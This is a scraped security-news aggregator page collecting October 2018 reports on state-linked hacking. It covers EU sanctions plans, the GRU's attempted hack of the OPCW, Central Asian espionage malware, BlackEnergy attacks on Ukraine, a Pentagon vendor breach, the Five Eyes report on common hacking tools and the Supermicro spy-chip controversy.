- BigBrothers -

Last update 09.10.2017 13:51:26

Introduction  List  Kategorie  Subcategory  0  1  2  3  4  5  6  7  8 


EU Leaders Vow Tough Action on Cyber Attacks
21.10.2018 securityweek 

EU leaders on Thursday condemned the attempted hack on the global chemical weapons watchdog and vowed to step up the bloc's efforts to tackle cyber attacks.

With concerns growing about the malign cyber activities of several countries around the world, notably Russia, the bloc's leaders called for work to begin to set up sanctions to punish hackers.

The decision at an EU summit in Brussels comes after eight countries led by Britain pushed for urgent moves to hit hackers, warning that a lack of action was giving the impression that cyber attacks would go unpunished.

"Work on the capacity to respond to and deter cyber attacks through EU restrictive measures should be taken forward," the 28 leaders said in their summit communique.

The statement condemned the bid, revealed this month, by Russia's GRU military intelligence agency to hack the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague.

"Such threats and attacks strengthen our common resolve to further enhance the EU's internal security and our ability and capabilities to detect, prevent, disrupt and respond to hostile activities of foreign intelligence networks," the summit statement said.

A proposal backed by Britain, Lithuania, Estonia, Latvia, Denmark, Finland, Romania and the Netherlands earlier this week called for a sanctions regime to be set up to punish cyber attackers.

If approved, the EU sanctions regime would freeze assets held in the bloc by targeted individuals and ban them from travelling to the 28 member states.

But efforts to crack down on cyber attackers may face resistance from some EU members who want to improve relations with Russia, such as the new Italian government.

Britain Leads Calls for EU Action Against Hackers
19.10.2018 securityweek

British Prime Minister Theresa May will call on fellow EU leaders Thursday to take united action to punish cyber attackers, warning hackers cause economic harm and undermine democracies.

Britain is among eight European Union countries pushing for the bloc to urgently agree a new sanctions regime to address malign cyber activities.

"We should accelerate work on EU restrictive measures to respond to and deter cyber attacks, including a robust sanctions regime," May will say, according to pre-released comments.

She will add: "Malign cyber activity causes harm to our economies, and undermines our democracies.

"As well as protecting ourselves against attack, we must impose proportionate consequences on those who would do us harm."

The move comes amid growing concern at Russia's activities, with Western powers blaming Moscow for numerous acts of hacking and electronic interference.

This month the Netherlands revealed dramatic details of a bid by Russia's GRU military intelligence agency to hack the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague.

This was "a stark example of the very real threats that we face", May will say, but also "a clear example of where these attacks can be prevented".

A confidential EU proposal seen by AFP and backed by Britain, Lithuania, Estonia, Latvia, Denmark, Finland, Romania and the Netherlands warns that "the pace of events has accelerated considerably".

The paper says it is "only a matter of time before we are hit by a critical operation with severe consequences on the EU".

Lithuania and the other Baltic states, Latvia and Estonia, say they come under near-daily cyber attacks, most originating in Russia, targeting everything from banks and government institutions to transport infrastructure.

Britain's National Cyber Security Centre (NCSC) revealed this week that it has dealt with more than 1,100 cyber incidents in the two years since it was set up, the majority carried out from within "hostile nation states".

May has repeatedly stressed that despite Britain leaving the EU in March, London wants the fullest possible security relationship with the bloc post-Brexit.

If approved, the EU sanctions regime would freeze assets held in the bloc by targeted individuals and ban them from travelling to the 28 member states.

But the proposal may face resistance from some EU members who want to improve relations with Russia, such as the new Italian government.

Russia-Linked Hackers Target Diplomatic Entities in Central Asia
18.10.2018 securityweek

Cybersecurity companies have been monitoring the activities of a threat group that focuses on espionage campaigns aimed at diplomatic entities in Central Asia.

Earlier this month, ESET detailed the threat actor's operations, which it tracks as Nomadic Octopus, at the Virus Bulletin conference. On Monday, Kaspersky also published a blog post covering some of the group's attacks and tools.

According to Kaspersky, which tracks the group as DustSquad, the hackers appear to speak Russian.

Anton Cherepanov, the ESET senior malware researcher who detailed Nomadic Octopus at Virus Bulletin, confirmed for SecurityWeek that the hackers may speak Russian based on the spear-phishing emails they send out and the use of Russian malware filenames.

ESET, which says the threat actor is very persistent, has identified only one type of malware used by Nomadic Octopus and has found evidence that the group has been active since at least 2015.

Kaspersky, however, has discovered both Windows and Android malware, and identified a campaign that dates as far back as 2014. The cyberspies appear to be focusing on private individuals and diplomatic entities in Central Asia, mostly former Soviet Union countries and Afghanistan.

In April 2018, researchers at Kaspersky discovered a new sample of DustSquad's Windows malware, which they are tracking as Octopus. The malware had been disguised as the Telegram messaging application, specifically a Russian version that appeared to have been used by the Democratic Choice (DVK) opposition party in Kazakhstan. The fake app emerged just as Kazakhstan had threatened to block Telegram over its use by the DVK.

DustSquad uses the Delphi programming language to develop its Octopus Trojan, the same as Sofacy's Zebrocy malware. While both DustSquad and Sofacy have been linked to Russia and malware from both groups was found on compromised machines, Kaspersky believes the threat actors are not related.

An analysis of the Octopus malware's different components revealed some apparently unfinished functionality. However, experts believe that the malware was actually created in a hurry and its developers decided not to implement certain capabilities.

Once it infects a system, the malware gives attackers remote access to the targeted machine, including the ability to execute commands, upload and download files, take screenshots, and search for RAR archives.

"Political entities in Central Asia have been targeted throughout 2018 by different actors, including IndigoZebra, Sofacy (with Zebrocy malware) and most recently by DustSquad (with Octopus malware)," Kaspersky researchers said. "Interestingly, we observed some victims who are ‘threat magnets’ targeted by all of them. From our experience we can say that the interest shown by threat actors in this region is now high, and the traditional ‘players’ have been joined by relative newcomers like DustSquad that have sprung up locally."

After 2016 Hack, Illinois Says Election System Secure
18.10.2018 securityweek
BigBrothers  Hacking

Illinois officials assured voters Tuesday that their Nov. 6 tallies "will be securely counted" following a data breach that's part of the Justice Department's investigation of Russian meddling in U.S. elections.

Board of Elections Chairman William Cadigan and a group of state and local officials — including Illinois National Guard leaders — said in Chicago that beefed-up measures to monitor and spot cybersecurity risks will ensure a fair and free election.

"We're as prepared as we ought to be right now, given the information we have," Cadigan said. "People should get out and vote because your vote is going to count and at the end of the day, we believe it's going to be securely counted."

The board hired three cybersecurity experts to watch elections and voter-data systems for irregularities, Cadigan said, including one housed at the Illinois State Police Statewide Terrorism and Intelligence Center. Local elections administrators have undergone rigorous training and the National Guard is on call for emergencies.

Officials discovered in summer 2016 that a hacker had downloaded information on up 76,000 Illinois voters in what federal authorities allege was a concentrated attack by Russian intelligence agents, but whether they penetrated states other than Illinois has never been determined.

State officials notified those affected and there's no indication that voting that fall was affected. But the Illinois breach and its potential damage was evident when it formed part of Justice Department special counsel Robert Mueller's indictment last July of a dozen Russian intelligence agents for hacking. The indictment alleged that the perpetrators stole information from as many as 500,000 voters.

Illinois authorities believe Mueller's investigators are counting even fragments of personal data that were not complete enough to require them to alert a voter.

Officials also noted that despite electronic voting in Illinois, state law requires that each vote leave behind a paper receipt, so any vote that is disrupted electronically can still be audited.

Logan County Clerk and Recorder Sally Turner said county and municipal elections administrators have met several times in the past year for extensive training on spotting and interpreting cyber threats.

"We want our communities and our voters to know that we as election officials in Illinois are focused on protecting our systems with rigorous attention to cybersecurity," Turner said.

Major Gen. Richard Hayes, Illinois' adjutant general, said Defense Department-trained analysts with the National Guard are on call. In case of catastrophe, they're quickly mobilized.

"If someone tries to disrupt the election on Election Day, we can have a guardsman dispatched within an hour anywhere in Illinois," elections board member Chuck Scholl said. "We'll have boots on the ground in whatever county, whatever election authority that's affected, within an hour."

Russia-linked BlackEnergy backed new cyber attacks on Ukraine’s state bodies

17.10.2018 securityaffairs APT  BigBrothers

The Security Service of Ukraine (SBU) uncovered a new targeted attack launched by BlackEnergy APT on the IT systems of Ukrainian government entities.
The Security Service of Ukraine (SBU) uncovered a new targeted attack on the information and telecommunication systems of Ukrainian government entities.
The SBU attributed the attack to the BlackEnergy Russia-linked APT group.
“The Security Service of Ukraine has received more evidence of the aggressive actions of Russian intelligence services against Ukraine in cyberspace using a controlled hacker group responsible for carrying out cyberattacks on Ukraine’s critical infrastructure facilities during 2015-2017, known as BlackEnergy and NotPetya,” reads the SBU’s press release.

BlackEnergy made the headlines as the responsible for the massive power outage that occurred in Ukraine in December 2015.

The BlackEnergy malware is a threat improved to target SCADA systems, some variants include the KillDisk component developed to wipe the disks and make systems inoperable.

According to the SBU, BlackEnergy hackers used new samples of malware in a recent series of attack. The new malicious code act as surveillance software, they implement surveillance capabilities and remote administration features.

SBU along with experts from a well-known antivirus company determined that the malware involved in the attack are updated versions of the Industroyer backdoor.

The specialists involved in the investigation helped the Ukraine SBU to attribute the attack and implement mitigations to protect the IT infrastructure of government agencies.

The malware used in the recent attacks borrows the code from the Industroyer as reported by the ukrinform.net. website

“They have a number of similar characteristics, in particular using similar code snippets, computing capabilities of infected systems, etc.” states the ukrinform.net.

Experts from the SBU also observed attackers using hacking tools that were used by the BlackEnergy hackers in previous attacks.

35 million US voter records available for sale in a hacking forum
17.10.2018 securityaffairs 

Millions of voter records are available for sale on the Dark Web, experts discovered over 35 million US voter records for sale in a hacking forum.
Millions of voter records are available for sale on the Dark Web, experts from Anomali and Intel 471 discovered 35 million US voter records for sale in a hacking forum.

Researchers have analyzed a sample of voter records and determined the data to be valid with a high degree of confidence.

Records in the voter registration database include personal and voting history information of US residents.

“Certain states require the seller to personally travel to locations in-state to receive the updated voter information.” reads the post published by Anomali.

“This suggests the information disclosure is not necessarily a technical compromise but rather a likely targeted campaign by a threat actor redistributing possibly legitimately obtained voter data for malicious purposes on a cybercrime forum,”

The seller only provided the number of records for the lists of voters belonging to three states asking for prices between $1,300 and $12,500.

Louisiana (3 million);
Wisconsin (6 million);
Texas (14 million);
us voter records

The seller also claims to have lists of voters for other states, including Montana, Iowa, Utah, Oregon, South Carolina, Wisconsin, Kansas, Georgia, New Mexico, Minnesota, Wyoming, Kentucky, Idaho, South Carolina, Tennessee, South Dakota, Mississippi, and West Virginia.

According to the seller, voting lists are weekly updated with the help of people in the state governments.

“Certain states require the seller to personally travel to locations in-state to receive the updated voter information.” reads a report published by Anomali Labs.

“This suggests the information disclosure is not necessarily a technical compromise but rather a likely targeted campaign by a threat actor redistributing possibly legitimately obtained voter data for malicious purposes on a cybercrime forum,”

This kind of information it a precious commodity for threat actors, members of the forum already expressed their interest in the huge trove of data.

“With the November 2018 midterm elections only four weeks away, the availability and currency of the voter records, if combined with other breached data, could be used by malicious actors to disrupt the electoral process or pursue large scale identity theft,” explained Hugh Njemanze, chief executive officer of Anomali.

The persistent access to voters records claimed by the seller represents a serious threat to US voters and for the US politics.

“Given the illicit vendor claims of weekly updates of voter records and their high reputation on the hacker forum, we assess with moderate confidence that he or she may have persistent database access and/or contact with government officials from each state.” concludes.

“These types of unauthorized information disclosures increasing the threat of possible disruptive attacks against the U.S. electoral process such as voter identity fraud and voter suppression.”

Pentagon Reveals Cyber Breach of Travel Records
14.10.2018 securityweek
BigBrothers  Incindent

The Pentagon on Friday said there has been a cyber breach of Defense Department travel records that compromised the personal information and credit card data of U.S. military and civilian personnel.

According to a U.S. official familiar with the matter, the breach could have affected as many as 30,000 workers, but that number may grow as the investigation continues. The breach could have happened some months ago but was only recently discovered.

The official, who spoke on condition of anonymity because the breach is under investigation, said that no classified information was compromised.

According to a Pentagon statement, a department cyber team informed leaders about the breach on Oct. 4.

Lt. Col. Joseph Buccino, a Pentagon spokesman, said the department is still gathering information on the size and scope of the hack and who did it.

Pentagon Breach"It's important to understand that this was a breach of a single commercial vendor that provided service to a very small percentage of the total population" of Defense Department personnel, said Buccino.

Pentagon Breach

The vendor was not identified and additional details about the breach were not available.

"The department is continuing to assess the risk of harm and will ensure notifications are made to affected personnel," said the statement, adding that affected individuals will be informed in the coming days and fraud protection services will be provided to them.

Buccino said that due to security reasons, the department is not identifying the vendor. He said the vendor is still under contract, but the department "has taken steps to have the vendor cease performance under its contracts."

Disclosure of the breach comes on the heels of a federal report released Tuesday that concluded that military weapons programs are vulnerable to cyberattacks and the Pentagon has been slow to protect the systems. And it mirrors a number of other breaches that have hit federal government agencies in recent years, exposing health data, personal information, and social security numbers.

The U.S. Government Accountability Office in its Tuesday report said the Pentagon has worked to ensure its networks are secure, but only recently began to focus more on its weapons systems security. The audit, conducted between September 2017 and October 2018, found that there are "mounting challenges in protecting its weapons systems from increasingly sophisticated cyber threats."

In 2015, a massive hack of the federal Office of Personnel Management, widely blamed on China's government, compromised personal information of more than 21 million current, former and prospective federal employees, including those in the Pentagon. It also likely occurred months before it was discovered and made public, and it eventually led to the resignation of the OPM director.

Also that year, hackers breached into the email system used by the Joint Chiefs of Staff, affecting several thousand military and civilian workers.

The Defense Department has consistently said that its networks and systems are probed and attacked thousands of times a day.

U.S. Senators Demand Internal Memo Related to Google+ Incident
14.10.2018 securityweek

A group of United States senators on Thursday sent a letter to Google, urging it to provide an internal memo that supposedly explains why the company did not disclose the Google+ data exposure that was discovered in March.

Affecting a Google+ API, the vulnerability provided applications with access to data they were not supposed to access, and up to 500,000 user accounts might have been impacted. The API was apparently exposing user data since 2015.

Google claims it has no evidence of developers being aware of the bug or of account data being misused. However, the Internet giant decided to shut down the Google+ platform, citing low user interest and difficulties in making it successful.

Amid privacy concerns rising from the Facebook-Cambridge Analytica scandal that erupted in March, the search company’s decision to cover up the flaw’s discovery doesn’t bode well with the privacy-conscious. The disclosure also cast a dark shadow over the launch of Google’s new phone, the Pixel 3.

Privacy concerns is what three U.S. senators underline in a letter (PDF) sent to Google chief executive officer Sundar Pichai.

They also question the Internet giant’s decision against a timely disclosure of the data exposure, as well as its willingness to inform the public when it becomes aware of any misuse of the impacted data.

The letter also mentions a Wall Street Journal article that refers to an internal memo at Google that details factors that determined the company to cover up the issue, such as fears that it would catch the attention of regulators and even draw comparisons to the Facebook privacy scandal.

“Data privacy is an issue of great concern for many Americans who use online services. Particularly in the wake of Cambridge Analytica controversy, customers’ trust in the companies that operate those services to keep their data secure has been shaken,” the letter reads.

“It is for this reason that the reported contents of Google’s internal memo are so troubling. At the same time that Facebook was learning the important lesson that tech firms must be forthright with the public about privacy issues, Google apparently elected to withhold information about a relevant vulnerability for fear of public scrutiny,” the letter continues.

What’s more, the senators mention the fact that, although Pichai testified in front of the Senate Commerce Committee on the issue of privacy only a couple of weeks ago, he did not mention the Google+ issue at the time.

“Google must be more forthcoming with the public and lawmakers if the company is to maintain or regain the trust of the users of its services,” the letter continues.

The senators request Pichai to provide written response to questions regarding when and how Google discovered the Google+ issue, on why it chose not to disclose it, whether it did inform federal agencies of the discovery, and if there are any other incidents it chose not to disclose, among others.

On top of that, the senators, who urge Google to provide a copy of the internal memo cited in the Wall Street Journal, ask the search company whether users of free Google services “should be afforded the same level of notification and mitigation efforts as paid G Suite subscribers” (Google is apparently committed to inform G Suite users immediately of any incidents involving their data).

Five Eyes Intelligence agencies warn of popular hacking tools
13.1.0218 securityaffairs 

Security agencies belonging to Five Eyes (United States, United Kingdom, Canada, Australia and New Zealand) have released a joint report that details some popular hacking tools.
Experts from cybersecurity agencies from Five Eyes intelligence alliance have issued a report that provides technical details on most popular hacking tool families and the way to detect and neutralizes attacks involving them.

The report was realized with the contribute of the researchers from the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC), and the US National Cybersecurity and Communications Integration Center (NCCIC).

“This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States.[1][2][3][4][5]” reads the report published by the experts.

“In it we highlight the use of five publicly available tools, which have been used for malicious purposes in recent cyber incidents around the world. The five tools are:

Remote Access Trojan: JBiFrost
Webshell: China Chopper
Credential Stealer: Mimikatz
Lateral Movement Framework: PowerShell Empire
C2 Obfuscation and Exfiltration: HUC Packet Transmitter
To aid the work of network defenders and systems administrators, we also provide advice on limiting the effectiveness of these tools and detecting their use on a network.”

The report provides technical details on remote access trojans (RATs), web shells, credential stealers, lateral movement frameworks, and command and control (C&C) obfuscators.

The experts analyzed the JBiFrost RAT, that is a variant of Adwind backdoor, that was used by almost any kind of attackers from nation-state hackers to low-skilled crooks.

“JBiFrost RAT is typically employed by cyber criminals and low-skilled threat actors, but its capabilities could easily be adapted for use by state-sponsored threat actors.

Other RATs are widely used by Advanced Persistent Threat (APT) actor groups, such as Adwind RAT, against the aerospace and defense sector; or Quasar RAT, by APT10, against a broad range of sectors.” states the report.

“JBiFrost RAT is Java-based, cross-platform, and multifunctional. It poses a threat to several different operating systems, including Windows, Linux, MAC OS X, and Android.”

The report also describes the popular post–exploitation tool Mimikatz that was used by many threat actors and the lateral movement framework PowerShell Empire, this latter is used by attackers to elevate privileges, harvest credentials, find nearby hosts, and move laterally across the target network.

The experts at Five Eyes agencies also detailed the China Chopper web shell, a code injection web shell that executes Microsoft .NET code within HTTP POST commands.

The China Chopper is a tiny shell (4K) widely used in attacks in the wild since 2012, early this year the China-linked APT group Leviathan. aka TEMP.Periscope, used it in attacks on engineering and maritime entities over the past months.

Another hacking tool described in the report is HUC Packet Transmitter (HTran), that could be exploited by attackers to obfuscate communications with the intent bypass security controls and evade detection.

“The individual tools we cover in this report are limited examples of the types of tools used by threat actors. You should not consider this an exhaustive list when planning your network defense.” states the report.

“Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states or criminals on the dark web. Today, malicious tools with a variety of functions are widely and freely available for use by everyone from skilled penetration testers, hostile state actors and organized criminals, to amateur cyber criminals.

The tools in this Activity Alert have been used to compromise information across a wide range of critical sectors, including health, finance, government, and defense. Their widespread availability presents a challenge for network defense and threat-actor attribution.”

'Five Eyes' Agencies Release Joint Report on Hacking Tools

12.10.2018 securityweek BigBrothers

Cybersecurity agencies in the United States, United Kingdom, Canada, Australia and New Zealand have released a joint report describing five of the most commonly used hacking tools.

The report was written by experts at the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC), and the US National Cybersecurity and Communications Integration Center (NCCIC).

The goal of the report, its authors said, is to provide network defenders and system administrators advice on how to detect the tools and limit their effectiveness.

Five types of tools are described, including remote access trojans (RATs), web shells, lateral movement frameworks, command and control (C&C) obfuscators, and credential stealers – all of which can be used after the targeted system has been compromised.

The RAT included in the report is JBiFrost, a variant of Adwind. The Five Eyes agencies have warned that while JBiFrost has been mostly used by low-skilled threat actors and cybercriminals, it can also be useful to state-sponsored groups.

JBiFrost works on Windows, Linux, macOS and Android, and its capabilities include lateral movement, installing additional malware, launching distributed denial-of-service (DDoS) attacks, and stealing information.

Agencies warned that JBiFrost has been increasingly used in targeted attacks aimed at critical infrastructure operators and their supply chain.

The web shell mentioned in the report is called China Chopper and it allows hackers to remotely access compromised servers. Widely used since 2012, the shell is only 4Kb in size and its payload is easy to modify, which makes it more difficult to detect.

China Chopper was used in the summer of 2018 in an attack that exploited an Adobe ColdFusion vulnerability tracked as CVE-2017-3066.

Another tool described in the report is Mimikatz, a popular open source application that has been around for more than a decade. Mimikatz has been used by many threat groups to steal passwords, including in the recent NotPetya and Bad Rabbit attacks.

Cybersecurity agencies have also warned of PowerShell Empire, a lateral movement framework released in 2015 as a legitimate penetration testing tool. PowerShell Empire allows attackers to elevate privileges, harvest credentials, log keystrokes, find nearby hosts, and move laterally across the network.

The tool was used in recent years in attacks aimed at the UK energy sector, South Korean organizations as part of a Winter Olympics-themed campaign, a multinational law firm, and academia.

The last hacking tool described in the report is HUC Packet Transmitter (HTran), which allows malicious actors to obfuscate communications. Hackers have been using it to evade detection, bypass security controls, obfuscate C&C traffic, and improve their C&C infrastructure.

"These tools have been used to compromise information across a wide range of critical sectors, including health, finance, government and defence. Their widespread availability presents a challenge for network defence and actor attribution," the report reads. "Experience from all our countries makes it clear that, while cyber actors continue to develop their capabilities, they still make use of established tools and techniques. Even the most sophisticated groups use common, publicly-available tools to achieve their objectives."

New Pentagon Weapons Systems Easily Hacked: Report
10.10.2018 securityweek

New US weapons systems being developed by the US Department of Defense can be easily be hacked by adversaries, a new government report said on Tuesday.

The Government Accountability Office said the Pentagon was unaware of how easy it could be for an adversary to gain access to the computer brains and software of the weapons systems and operate inside them undetected.

The weak points began with poor password management and unencrypted communications, it said.

But it said access points for the systems continued to grow in number and are not always well-understood by the operators themselves, leaving even non-networked systems deeply vulnerable.

More critically, the report faulted the US military for not incorporating cybersecurity into the design and acquisition process for the computer-dependent weapons, and said weapons developers often did not themselves adequately understand cybersecurity issues.

"Due to this lack of focus on weapon systems cybersecurity, DOD likely has an entire generation of systems that were designed and built without adequately considering cybersecurity," the GAO said.

"In one case, it took a two-person test team just one hour to gain initial access to a weapon system and one day to gain full control of the system they were testing," it said.

In another case, it said, the test team gained control of the terminals of the system's operators.

"They could see, in real-time, what the operators were seeing on their screens and could manipulate the system."

The public, unclassified version of the report did not identify which arms systems it had tested and found faults with, citing the need for secrecy.

But it said that between 2012 and 2017, the Defense Department's own testers "routinely" found dangerous cyber vulnerabilities in "nearly all" weapons systems under development.

"Using relatively simple tools and techniques, testers were able to take control of these systems and largely operate undetected. In some cases, system operators were unable to effectively respond to the hacks," it said.

The risk rises as Pentagon weapons and other systems are increasingly interconnected and their dependence on software and networking continues to rise.

The report came as the US government wrestles with what it sees as concerted efforts by government-backed hackers in Russia and China to permeate government and private sector computer networks to steal data or simply wreak havoc.

Man Pleads Guilty to Hacking Websites of New York City Comptroller and West Point
8.10.2018 securityweek

The United States Department of Justice (DoJ) this week announced that a California man has pleaded guilty to hacking the websites for the Combating Terrorism Center at the United States Military Academy in West Point, New York, and the Office of the New York City Comptroller.

The man, Billy Ribeiro Anderson, 41, of Torrance, California, also known as “Anderson Albuquerque” and “AlfabetoVirtual,” admitted to obtaining unauthorized access to the two websites and to defacing them by replacing publicly available contents of the website with hacker-generated content.

According to court documents, from 2015 through at least March 13, 2018, Anderson took responsibility for accessing various U.S. military, government, and business websites around the world, all without authorization.

Using the online handle of AlfabetoVirtual, he also committed more than 11,000 defacements of said websites, including websites for the Combating Terrorism Center at West Point and the NYC Comptroller.

The NYC Comptroller’s website was defaced on July 10, 2015. Anderson, who took responsibility for the incident, replaced the contents of the website to display the text “Hacked by AlfabetoVirtual,” “#FREEPALESTINE” and “#FREEGAZA.”

The hacker gained access to the website and was able to deface it by exploiting security vulnerabilities associated with the version of a plugin being used on the website.

Anderson defaced a website for the Combating Terrorism Center at West Point on October 4, 2016 and modified the site’s content to display the text “Hacked by AlfabetoVirtual.” He gained access to the site via an unauthorized administrative account that exploited a known cross-site script vulnerability, which allowed the hacker to bypass access controls.

Anderson also committed unauthorized intrusions of thousands of web servers worldwide through malicious code installed on the victim web servers. The code provided the hacker with administrative rights to the servers, which then enabled it to commit defacements and maintain a foothold on the compromised servers.

“The defendant pled guilty to two counts of computer fraud for causing damage to a protected computer, each of which carries a maximum sentence of 10 years in prison,” the DoJ announced. Anderson is scheduled for sentencing on February 13, 2019.

Russia's Hackers Long Tied to Military, Secret Services
8.10.2018 securityweek

During the Soviet era, the country's top computer scientists and programmers largely worked for the secret services.

That practice appears to have resumed under President Vladimir Putin, as Russia faces accusations of waging a global campaign of cyber attacks.

Dutch officials on Thursday accused four Russians from the GRU military intelligence agency of attempting to hack into the global chemical weapons watchdog in The Hague.

The agency has investigated both the fatal poisoning of Russian former double-agent Sergei Skripal; and an alleged chemical attack by Moscow-allied Syrian President Bashar al-Assad.

The Baltic states were the first to accuse Moscow of mounting attacks to knock out their sites back in 2007.

Estonia said one such attack had put the country's main emergency service phone number out of action for over an hour.

Since then, accusations of cyber attacks have continued against Moscow.

The Russian hacker group variously known as Fancy Bear, APT 28 and Sofacy has been linked to GRU and accused of attacks on the US Democrats' 2016 presidential campaign, together with Russia's FSB security service, the successor to the KGB.

The skills of Russian hackers today developed from a tradition of excellent computing and programming skills dating back to the Soviet era.

"The whole structure of the economy was skewed towards the military sector," said Oleg Demidov, a consultant at the Moscow-based independent think-tank PIR Center.

"All the achievements of Soviet science including the first computers went to serve the military sector."

The most brilliant students were pushed to work in the military and space sector, he added.

- Banking crime -

After the Soviet Union fell apart in 1991, its armed forces were broken up and most of the top specialists turned to the nascent banking sector in Russia, either to work there or to attack it.

In this era saw the first cyber attacks on banking operations and the first mentions of Russian hackers.

"Now Russian hackers are excellently trained and equipped and they still occupy one of the top positions in banking crime," said Demidov -- even if the Russian justice system has begun to crack down on them.

In 2016, Russian cybersecurity giant Kaspersky estimated that between 2012 and 2015, Russian hackers had stolen at least $790 million worldwide.

Russian computer scientists study at "very strong universities in Saint Petersburg, Moscow, Novosibirsk, Kazan or Krasnoyarsk", said Denis Kuskov of TelecomDaily specialised research agency.

They "can work anywhere in the world, in any international company," he added.

In recent years, however, more have opted to stay in Russia, he said. "The secret services have grown more interested in good programmers and it's easier for them to find work in Russia now."

In 2012, the Russian defence ministry announced it was creating its own "cyber troops". It launched a wide recruitment drive that included promotional videos on social media.

For Demidov, the growing wave of attacks attributed to Russian hackers has come about as Russia becomes better able to defend its own cyber security more strongly, the military sphere included.

"These efforts... have began to bring results," he said.

Today however, even the most established players in Russian IT are in the sights of the West.

The US in 2017 imposed a ban on the use of Kaspersky's anti-virus software by federal agencies amid concerns about the company's links to the Russian intelligence services.

While many young Russians may choose to work for the military and secret services for reasons of patriotism, some may still be more interested by the money.

This week a military tribunal in Moscow held a closed-doors trial for the head of operational control at the FSB's centre for information security, Colonel Sergei Mikhalkov and three alleged accomplices.

Kommersant daily reported that they were accused of passing secrets on the Russian secret services' cyber technology to the FBI in return for $10 million.

UK, US Security Agencies Deny Investigating Chinese Spy Chips
8.10.2018 securityweek

The U.S. Department of Homeland Security (DHS) and the U.K. National Cyber Security Centre (NCSC) have denied investigating the presence of Chinese spy chips in Supermicro servers, as claimed by a bombshell report published last week by Bloomberg.

According to Bloomberg, the Chinese government planted tiny chips in Supermicro motherboards in an effort to spy on more than 30 organizations in the United States, including government agencies and tech giants such as Apple and Amazon.

The report, on which Bloomberg reporters have been working for the past year using information from 17 sources, claims that Chinese agents masquerading as government or Super Micro employees pressured or bribed managers at the Chinese factories where the motherboards are built. Once the chips were planted, they would allow attackers to remotely access the compromised devices.DHS and NCSC respond to reports on Chinese spy chips

Apple and Amazon allegedly discovered the malicious hardware implants and contacted the FBI.

While many experts agree that it is technically possible to create and plant spy chips such as the one described, Apple, Amazon and Super Micro have strongly denied the reports, and their statements have now been backed by the DHS and the NCSC.

“We are aware of the media reports but at this stage have no reason to doubt the detailed assessments made by AWS and Apple,” stated the NCSC. “The NCSC engages confidentially with security researchers and urges anybody with credible intelligence about these reports to contact us.”

The DHS also published a statement on Saturday saying it's aware of the media reports.

“Like our partners in the UK, the National Cyber Security Centre, at this time we have no reason to doubt the statements from the companies named in the story,” the agency stated. “Information and communications technology supply chain security is core to DHS’s cybersecurity mission and we are committed to the security and integrity of the technology on which Americans and others around the world increasingly rely.”

No one has been able to independently confirm that the FBI has launched an investigation as a result of the discovery of spy chips, and a former Apple executive said the agency's representatives told him that they had never heard of this type of investigation.

Apple, Amazon and Super Micro have been contacted by Bloomberg several times while the article was being written, but they are not happy with the final result. While it's not uncommon for major companies to deny news reports, the statements issued by the tech giants named in the Bloomberg story stand out due to the fact that they are very detailed and attempt to show that the article is factually inaccurate.

“At no time, past or present, have we ever found any issues relating to modified hardware or malicious chips in SuperMicro motherboards in any Elemental or Amazon systems. Nor have we engaged in an investigation with the government,” Amazon said. “There are so many inaccuracies in ‎this article as it relates to Amazon that they’re hard to count.”

Apple claims it's disappointed that Bloomberg reporters have not been open to the possibility that their sources might be misinformed or wrong.

“Despite numerous discussions across multiple teams and organizations, no one at Apple has ever heard of this investigation. Businessweek has refused to provide us with any information to track down the supposed proceedings or findings. Nor have they demonstrated any understanding of the standard procedures which were supposedly circumvented,” Apple said.

For its part, Super Micro also denied knowing anything about a government investigation.

“The manufacture of motherboards in China is not unique to Supermicro and is a standard industry practice. Nearly all systems providers use the same contract manufacturers. Supermicro qualifies and certifies every contract manufacturer and routinely inspects their facilities and processes closely,” it stated.

China Tech Stocks Lenovo, ZTE Tumble After Chip Hack Report
7.10.2018 securityweek

HONG KONG (AP) — Chinese tech stocks Lenovo Group and ZTE Corp. tumbled in Hong Kong on Friday following a news report Chinese spies might have used chips supplied by another company to hack into U.S. computer systems.

Lenovo shares closed down 15.1 percent while ZTE lost 11 percent.

Bloomberg News cited unidentified U.S. officials as saying malicious chips were inserted into equipment supplied by Super Micro Computer Inc. to American companies and government agencies.

Lenovo, with headquarters in Beijing and Research Triangle Park, North Carolina, is the biggest global manufacturer of personal computers and has a growing smartphone brand.

"Super Micro is not a supplier to Lenovo in any capacity," said Lenovo in a statement. "Furthermore, as a global company we take extensive steps to protect the ongoing integrity of our supply chain."

A spokeswoman for ZTE, headquartered in Shenzhen in southern China, said she wasn't aware of the report.

The Chinese foreign ministry didn't respond to a request for comment.

Bloomberg said Chinese military operatives added components to Super Micro products made at factories in China. It said the components included code that caused the products to accept changes to their software and to connect to outside computers.

Super Micro, headquartered in San Jose, California, denied its products contained malicious chips.

"Supermicro has never found any malicious chips, nor been informed by any customer that such chips have been found," said a company statement.

Chinese tech companies face heightened scrutiny in the United States.

A 2012 report by a congressional panel said ZTE and Chinese rival Huawei Technology Ltd. were security risks and warned American telecoms companies not to buy their equipment.

ZTE faced possible bankruptcy this year after Washington imposed a seven-year ban on sales of U.S. technology to the company over its exports to Iran and North Korea. American authorities lifted the ban in July after ZTE paid a $1 billion fine, agreed to replace its executive team and hired U.S.-selected compliance officers.

West Accuses Russian Spy Agency of Scores of Attacks

7.10.2018 securityweek BigBrothers

LONDON (AP) — The West unleashed an onslaught of new evidence and indictments Thursday accusing Russian military spies of hacking so widespread that it seemed to target anyone, anywhere who investigates Moscow's involvement in an array of criminal activities — including doping, poisoning and the downing of a plane.

Russia defiantly denied the charges, neither humbled nor embarrassed by the exceptional revelations on one of the most high-tension days in East-West relations in years. Moscow lashed back with allegations that the Pentagon runs a clandestine U.S. biological weapons program involving toxic mosquitoes, ticks and more.

The nucleus of Thursday's drama was Russia's military intelligence agency known as the GRU, increasingly the embodiment of Russian meddling abroad.

